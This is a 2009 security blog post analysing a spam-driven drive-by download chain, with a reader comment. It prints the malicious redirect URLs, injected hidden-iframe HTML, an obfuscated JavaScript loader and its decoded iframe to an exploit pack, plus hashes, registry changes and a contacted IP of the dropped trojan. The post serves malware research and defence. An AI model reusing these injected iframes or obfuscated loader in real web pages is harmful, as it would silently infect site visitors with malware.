Buy Buy Exploitation

Posted on Saturday, January 3rd, 2009 | Bookmark on del.icio.us

by Jose Nazario

We stumbled across a set of links recently via the MITRE Honeyclient, which we feed our spam URLs to. A handful of URLs that have been spammed out were triggered as malicious. Analysis shows that they are roughly the same basic injected code.

WARNING — LIVE EXPLOIT LINKS BELOW

Here’s the exploit chain, IFRAMEs and reloads.

http://flemminglind.dk/images/buybuy.html
-> http://numeralingenuity.com/
-> http://diettopseek.cn/in.cgi?cocacola
   -> http://north-host.net/images/new/index.php
      -> http://north-host.net//images/new/pdf.php
         -> http://north-host.net//images/new/load.php

Google shows that a few sites look similar:

Results 1 – 8 of 8 for inurl:buybuy.html. (0.44 seconds)

That page, buybuy.html, directs you to a pharmacy site while also starting you down the exploit chain:
<meta http-equiv="refresh" content="0;url=http://numeralingenuity.com/" /<html><body><iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
This IFRAME is getting some popularity too (some of these are malicious sites, some are discussions about it):

Results 1 – 9 of 9 for http://diettopseek.cn/in.cgi?cocacola. (0.37 seconds)

Now that IFRAME content diettopseek.cn/in.cgi?cocacola
<html> <head> <meta http-equiv="REFRESH" content="1; URL='http://north-host.net/images/new/index.php'"> #!/bin/sh </head> <body> document moved <a href="http://north-host.net/images/new/index.php">here</a> </body> </html>
Now that new site, north-host.net/images/new/index.php, is some JavaScript that creates a new IFRAME:
<html><body><script>function gluerr(){returntrue;}window.onerror=gluerr;var g="wQiSn+d+o+wQ.+e+vQaQlS";g=g.replace(/[\+u0SQ]/g,"");</script><style>.fU8TgEJnyVG3W{di splay:none;}</style><b class="fU8TgEJnyVG3W"id="fU8TgEJnyVG3W">100#111#99#117#109#101#110#116#46#119#114#10 5#116#101#40#34#60#105#102#114#97#109#101#32#115#114#99#61#39#104#116#116#112#58 #47#47#110#111#114#116#104#45#104#111#115#116#46#110#101#116#47#47#105#109#97#10 3#101#115#47#110#101#119#47#112#100#102#46#112#104#112#39#32#119#105#100#116#104 #61#49#32#104#101#105#103#104#116#61#49#32#102#114#97#109#101#98#111#114#100#101 #114#61#48#62#60#47#105#102#114#97#109#101#62#34#41#59</b><script>var Prototype=eval(g);var s=document.getElementById("fU8TgEJnyVG3W").innerHTML.replace(/[A-Za- z]/g,function (c){returnString.fromCharCode((((c=c.charCodeAt(0))&223)- 52)%26+(c&32)+65);}).split("#");var p="";for(var i=0;i<s.length;i++){p+=String.fromCharCode(s[i]);}Prototype(p);</script></body></html>
This generates a bit of code (in the variable ‘p’) that reads:
document.write("<iframe src=\'http://north-host.net//images/new/pdf.php\' width=1 height=1 frameborder=0></iframe>");
and then evaluates it. Now you have an IFRAME to north-host.net//images/new/pdf.php, which itself is an exploit pack. You get to load.php on success, which drops an EXE on your box.

MD5: 79b7b2640ce97fa68487e9a2e42e2a0a
SHA1: b4fdd63605b3d126a0e8ad95f942d1c9a6714ec3
File type: application/x-ms-dos-executable
File size: 22016 bytes

Here’s a brief rundown of the file:

New Files
C:\Documents and Settings\Mal01\Desktop\digeste.dll
C:\WINDOWS\system32\digeste.dll

New Registry Key
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders “” = msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll

Network Activity
Connects to host 213.155.6.80 TCP port 80

It’s poorly recognized, both specifically and generally.

File load.php_id_92555_spl_5 received on 01.03.2009 22:07:54 (CET)
 Antivirus	Version	Last Update	Result
a-squared	4.0.0.73	2009.01.03	-
AhnLab-V3	2008.12.31.0	2009.01.03	-
AntiVir	7.9.0.45	2009.01.03	-
Authentium	5.1.0.4	2009.01.03	-
Avast	4.8.1281.0	2009.01.03	-
AVG	8.0.0.199	2009.01.03	-
BitDefender	7.2	2009.01.03	-
CAT-QuickHeal	10.00	2009.01.03	-
ClamAV	0.94.1	2009.01.03	-
Comodo	869	2009.01.03	-
DrWeb	4.44.0.09170	2009.01.03	Trojan.Botnetlog.1
eTrust-Vet	31.6.6289	2009.01.02	-
Ewido	4.0	2008.12.31	-
F-Prot	4.4.4.56	2009.01.03	-
F-Secure	8.0.14470.0	2009.01.03	-
Fortinet	3.117.0.0	2009.01.03	-
GData	19	2009.01.03	-
Ikarus	T3.1.1.45.0	2009.01.03	-
K7AntiVirus	7.10.575	2009.01.03	-
Kaspersky	7.0.0.125	2009.01.03	Trojan.Win32.Agent.bctg
McAfee	5483	2009.01.03	-
McAfee+Artemis	5483	2009.01.03	-
Microsoft	1.4205	2009.01.03	-
NOD32	3733	2009.01.02	-
Norman	5.80.02	2009.01.02	-
Panda	9.0.0.4	2009.01.03	-
PCTools	4.4.2.0	2009.01.03	-
Prevx1	V2	2009.01.03	Malicious Software
Rising	21.10.22.00	2008.12.31	-
SecureWeb-Gateway	6.7.6	2009.01.03	Win32.LooksLike.NewMalware
Sophos	4.37.0	2009.01.03	-
Sunbelt	3.2.1809.2	2008.12.22	-
Symantec	10	2009.01.03	-
TheHacker	6.3.1.4.204	2009.01.02	-
TrendMicro	8.700.0.1004	2009.01.02	-
VBA32	3.12.8.10	2009.01.03	-
ViRobot	2009.1.3.1541	2009.01.03	-
VirusBuster	4.5.11.0	2009.01.03	-

And that’s the kind of thing that’s been continuing for a while now. It would be nice to look more at the malware to discover what they’re up to.

Popularity: 2% [?]

This entry was posted on Saturday, January 3rd, 2009 at 10:04 pm and is filed under Attacks and DDoS Attacks, Honeypots, Malware, Spam. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

2 Responses | Add your own

Comment Post by: Bachi — January 7th, 2009 @ 8:33 am EST Reply

We’ve experienced a lot of these attacks recently (most of them this morning). Via hacked ftp accounts all index.* files of at least 12 domains were infected with:

right after the tag.

Comment Post by: Bachi — January 7th, 2009 @ 8:35 am EST Reply

{iframe src=”http://litedownloadseek.cn/in.cgi?cocacola3″ width=1 height=1 style=”visibility: hidden”}
{/iframe} (replaced >< with }{)

DDoS and Security Reports

Real-Time Internet Traffic Analysis

Tag Cloud

Buy Buy Exploitation

2 Responses | Add your own

Leave a Comment